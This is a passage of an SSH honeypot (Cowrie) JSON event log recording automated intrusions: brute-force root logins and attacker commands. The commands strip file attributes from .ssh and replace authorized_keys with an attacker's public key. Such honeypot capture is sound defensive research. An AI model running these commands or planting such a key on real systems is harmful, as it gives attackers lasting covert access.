istp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:09:19.230589Z","src_ip":"212.227.235.229","session":"f7fa26620e15"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:09:19.662790Z","src_ip":"212.227.235.229","session":"629fdfe2cba8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48334,"dst_ip":"1.2.3.4","dst_port":22,"session":"b6ea29825c80","protocol":"ssh","message":"New connection: 212.227.235.229:48334 (1.2.3.4:22) [session: b6ea29825c80]","sensor":"my-vps","timestamp":"2025-08-31T06:09:19.843717Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:09:19.844276Z","src_ip":"212.227.235.229","session":"b6ea29825c80"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:09:20.022183Z","src_ip":"212.227.235.229","session":"b6ea29825c80"}
{"eventid":"cowrie.login.success","username":"root","password":"server@123","message":"login attempt [root/server@123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:09:20.411512Z","src_ip":"212.227.235.229","session":"f7fa26620e15"}
{"eventid":"cowrie.session.connect","src_ip":"43.159.36.188","src_port":39332,"dst_ip":"1.2.3.4","dst_port":22,"session":"3f0082807f5f","protocol":"ssh","message":"New connection: 43.159.36.188:39332 (1.2.3.4:22) [session: 3f0082807f5f]","sensor":"my-vps","timestamp":"2025-08-31T06:09:20.758280Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:09:20.759347Z","src_ip":"43.159.36.188","session":"3f0082807f5f"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:09:20.799236Z","src_ip":"212.227.235.229","session":"b6ea29825c80"}
{"eventid":"cowrie.session.closed","duration":"5.7","message":"Connection lost after 5.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:09:20.968042Z","src_ip":"212.227.235.229","session":"1d52d4f572a5"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:09:20.978247Z","src_ip":"212.227.235.229","session":"b6ea29825c80"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:09:21.002320Z","src_ip":"212.227.235.229","session":"f7fa26620e15"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:09:21.003350Z","src_ip":"212.227.235.229","session":"f7fa26620e15"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:09:21.005308Z","src_ip":"212.227.235.229","session":"f7fa26620e15"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:09:21.008010Z","src_ip":"43.159.36.188","session":"3f0082807f5f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37012,"dst_ip":"1.2.3.4","dst_port":22,"session":"c31ffdb1afd4","protocol":"ssh","message":"New connection: 212.227.235.229:37012 (1.2.3.4:22) [session: c31ffdb1afd4]","sensor":"my-vps","timestamp":"2025-08-31T06:09:21.142982Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:09:21.143674Z","src_ip":"212.227.235.229","session":"c31ffdb1afd4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:09:21.293505Z","src_ip":"212.227.235.229","session":"f7fa26620e15"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:09:21.352090Z","src_ip":"212.227.235.229","session":"c31ffdb1afd4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:09:21.924271Z","src_ip":"212.227.235.229","session":"f7fa26620e15"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T06:09:21.924979Z","src_ip":"212.227.235.229","session":"f7fa26620e15"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"mysql","message":"login attempt [postgres/mysql] failed","sensor":"my-vps","timestamp":"2025-08-31T06:09:22.041847Z","src_ip":"43.159.36.188","session":"3f0082807f5f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T06:09:22.213602Z","src_ip":"212.227.235.229","session":"f7fa26620e15"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:09:22.214936Z","src_ip":"212.227.235.229","session":"f7fa26620e15"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa123456789.","message":"login attempt [root/Aa123456789.] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:09:22.227549Z","src_ip":"212.227.235.229","session":"c31ffdb1afd4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46174,"dst_ip":"1.2.3.4","dst_port":22,"session":"24cdeeb51c1b","protocol":"ssh","message":"New connection: 212.227.235.229:46174 (1.2.3.4:22) [session: 24cdeeb51c1b]","sensor":"my-vps","timestamp":"2025-08-31T06:09:22.498318Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:09:22.499386Z","src_ip":"212.227.235.229","session":"24cdeeb51c1b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:09:22.663723Z","src_ip":"212.227.235.229","session":"c31ffdb1afd4"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:09:22.664455Z","src_ip":"212.227.235.229","session":"c31ffdb1afd4"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:09:22.665385Z","src_ip":"212.227.235.229","session":"c31ffdb1afd4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:09:22.784853Z","src_ip":"212.227.235.229","session":"24cdeeb51c1b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:09:22.875051Z","src_ip":"212.227.235.229","session":"c31ffdb1afd4"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:09:23.291401Z","src_ip":"43.159.36.188","session":"3f0082807f5f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:09:23.348360Z","src_ip":"212.227.235.229","session":"c31ffdb1afd4"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T06:09:23.349104Z","src_ip":"212.227.235.229","session":"c31ffdb1afd4"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T06:09:23.560562Z","src_ip":"212.227.235.229","session":"c31ffdb1afd4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:09:23.561700Z","src_ip":"212.227.235.229","session":"c31ffdb1afd4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36442,"dst_ip":"1.2.3.4","dst_port":22,"session":"fa5685c09d10","protocol":"ssh","message":"New connection: 212.227.235.229:36442 (1.2.3.4:22) [session: fa5685c09d10]","sensor":"my-vps","timestamp":"2025-08-31T06:09:23.765943Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:09:23.766580Z","src_ip":"212.227.235.229","session":"fa5685c09d10"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T06:09:23.967123Z","src_ip":"212.227.235.229","session":"24cdeeb51c1b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:09:23.973473Z","src_ip":"212.227.235.229","session":"fa5685c09d10"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:09:23.984953Z","src_ip":"212.227.125.160","session":"2923a3717be3"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T06:09:24.841317Z","src_ip":"212.227.235.229","session":"fa5685c09d10"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:09:25.253924Z","src_ip":"212.227.235.229","session":"24cdeeb51c1b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47420,"dst_ip":"1.2.3.4","dst_port":22,"session":"4bd566471ef5","protocol":"ssh","message":"New connection: 212.227.235.229:47420 (1.2.3.4:22) [session: 4bd566471ef5]","sensor":"my-vps","timestamp":"2025-08-31T06:09:25.533476Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:09:25.534375Z","src_ip":"212.227.235.229","session":"4bd566471ef5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51456,"dst_ip":"1.2.3.4","dst_port":22,"session":"ce3f9c301cf1","protocol":"ssh","message":"New connection: 212.227.125.160:51456 (1.2.3.4:22) [session: ce3f9c301cf1]","sensor":"my-vps","timestamp":"2025-08-31T06:09:25.546616Z"}
{"eventid":"cowrie.login.failed","username":"dev","password":"dev","message":"login attempt [dev/dev] failed","sensor":"my-vps","timestamp":"2025-08-31T06:09:25.752025Z","src_ip":"212.227.125.160","session":"ed593f47425a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:09:25.816295Z","src_ip":"212.227.235.229","session":"4bd566471ef5"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:09:26.050445Z","src_ip":"212.227.235.229","session":"fa5685c09d10"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:09:26.057496Z","src_ip":"212.227.125.160","session":"ce3f9c301cf1"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 